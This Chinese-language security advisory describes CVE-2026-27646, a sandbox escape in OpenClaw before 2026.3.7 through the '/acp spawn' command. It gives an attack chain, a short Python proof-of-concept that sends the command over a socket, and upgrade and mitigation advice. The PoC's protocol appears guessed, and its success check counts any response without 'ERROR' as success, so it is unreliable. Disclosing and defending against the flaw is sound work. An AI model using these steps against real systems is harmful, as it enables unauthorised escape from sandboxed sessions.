CVE-2026-27646 OpenClaw沙箱逃逸漏洞

漏洞信息

漏洞编号

CVE-2026-27646

漏洞类型

沙箱逃逸

CVSS评分

6.1 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 在 2026.3.7 之前的版本中存在一处沙箱逃逸漏洞。该漏洞位于 /acp spawn 命令处理逻辑中，允许经过授权的沙箱会话初始化主机端的 ACP 运行时环境。攻击者可以在拥有沙箱访问权限的情况下，通过调用特定的斜杠命令，绕过原有的沙箱安全限制，从受隔离的聊天上下文逃逸至主机端 ACP 会话。此漏洞可能导致攻击者获得超出沙箱限制的控制权，对系统完整性构成严重威胁。

技术细节

该漏洞的核心技术原理在于 OpenClaw 应用程序在处理 /acp spawn 斜杠命令时，未能对调用上下文进行严格的隔离验证。在受影响版本中，当 ACP（高级控制面板）功能处于启用状态时，系统内部的权限校验逻辑存在严重缺陷。攻击者首先需要获取一个低权限的沙箱会话凭证，这是利用该漏洞的前提条件。随后，攻击者利用该会话向服务器发送 /acp spawn 命令。由于系统错误地将源自沙箱环境的该命令请求视为受信任的主机端调用，从而绕过了沙箱边界限制，触发了主机端 ACP 运行时的初始化流程。这一过程导致攻击者成功逃逸出受限的沙箱环境，获得了对主机端 ACP 会话的控制权。这种对完整性的破坏使得攻击者能够执行原本被禁止的高权限操作，严重威胁系统安全。

攻击链分析

STEP 1

1. 获取访问权限

攻击者首先需要获取一个低权限的沙箱会话凭证，登录到 OpenClaw 的受限聊天环境中。

STEP 2

2. 探测环境

攻击者确认目标是否启用了 ACP 功能，因为该漏洞仅在 ACP 启用时才可被利用。

STEP 3

3. 发送恶意命令

攻击者在沙箱聊天上下文中输入并发送 /acp spawn 斜杠命令。

STEP 4

4. 绕过沙箱限制

由于系统漏洞，/acp spawn 命令被错误处理，触发了主机端 ACP 运行时的初始化，导致沙箱逃逸。

STEP 5

5. 获取主机控制权

攻击者成功进入主机端 ACP 会话，获得了对系统完整性的高影响操作能力。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-27646: OpenClaw Sandbox Escape via /acp spawn
# This script demonstrates the concept of triggering the sandbox escape.

import socket

def trigger_sandbox_escape(target_ip, target_port, session_id):
    """
    Sends the /acp spawn command to escape the sandbox context.
    """
    try:
        # Establish connection to the OpenClaw service
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect((target_ip, target_port))
        
        # Simulate authentication with a sandboxed session
        auth_payload = f"SESSION_ID:{session_id}\n"
        conn.sendall(auth_payload.encode())
        print("[*] Authenticated with low-privilege sandbox session.")
        
        # Send the malicious command to trigger the vulnerability
        # The /acp spawn command is not properly sanitized in vulnerable versions
        exploit_payload = "/acp spawn\n"
        conn.sendall(exploit_payload.encode())
        print("[*] Sent /acp spawn command to trigger host-side ACP initialization.")
        
        # Receive response to check if the exploit was successful
        response = conn.recv(1024).decode()
        if "ACP_RUNTIME_INIT" in response or "ERROR" not in response:
            print("[+] Potential sandbox escape successful. Host-side ACP context initialized.")
        else:
            print("[-] Exploit failed or patched.")
            
        conn.close()
    except Exception as e:
        print(f"[-] Connection error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    trigger_sandbox_escape("192.168.1.10", 8080, "sandbox_token_123")

影响范围

OpenClaw < 2026.3.7

防御指南

临时缓解措施

建议用户尽快将 OpenClaw 升级至 2026.3.7 版本以修复此漏洞。对于暂时无法升级的环境，应禁用 ACP 功能以阻断攻击路径。此外，管理员应加强对沙箱会话的监控，检测是否有异常的 /acp spawn 命令调用。